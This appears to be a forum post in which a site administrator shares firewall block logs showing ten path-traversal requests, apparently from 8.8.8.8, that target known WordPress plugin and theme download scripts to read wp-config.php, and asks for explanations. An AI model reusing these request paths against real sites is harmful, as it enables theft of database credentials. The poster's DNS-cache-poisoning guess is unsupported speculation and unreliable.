upon checking my notification emails today - those sent by CSF (like fail2ban) - I noticed that one exploit appears to be launched from Google DNS IP: 8.8.8.8. I have searched online and not found much on this.
Here are the offending log entries:
Code: Select all
Time: Fri Feb 21 05:22:33 2020 +1100
IP: 8.8.8.8 (US/United States/dns.google)
Failures: 10 (accessdenied)
Interval: 86400 seconds
Blocked: Temporary Block for 86400 seconds [LF_CUSTOMTRIGGER]
Log entries:
8.8.8.8 - - [21/Feb/2020:05:19:48 +1100] "GET /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 967 4036
8.8.8.8 - - [21/Feb/2020:05:20:02 +1100] "GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 999 4036
8.8.8.8 - - [21/Feb/2020:05:20:14 +1100] "GET /wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 942 4036
8.8.8.8 - - [21/Feb/2020:05:20:25 +1100] "GET /wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 945 4036
8.8.8.8 - - [21/Feb/2020:05:21:15 +1100] "GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 975 4036
8.8.8.8 - - [21/Feb/2020:05:21:28 +1100] "GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 952 4036
8.8.8.8 - - [21/Feb/2020:05:21:40 +1100] "GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 948 4036
8.8.8.8 - - [21/Feb/2020:05:21:52 +1100] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 947 4036
8.8.8.8 - - [21/Feb/2020:05:22:17 +1100] "GET /wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 926 4036
8.8.8.8 - - [21/Feb/2020:05:22:28 +1100] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 403 13 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 919 4036
Any ideas?
PS: My best guess at the moment, is that maybe one of the external nameservers suffered DNS cache poisoning?
Update: I am still looking into this, mainly to avoid such situations in future...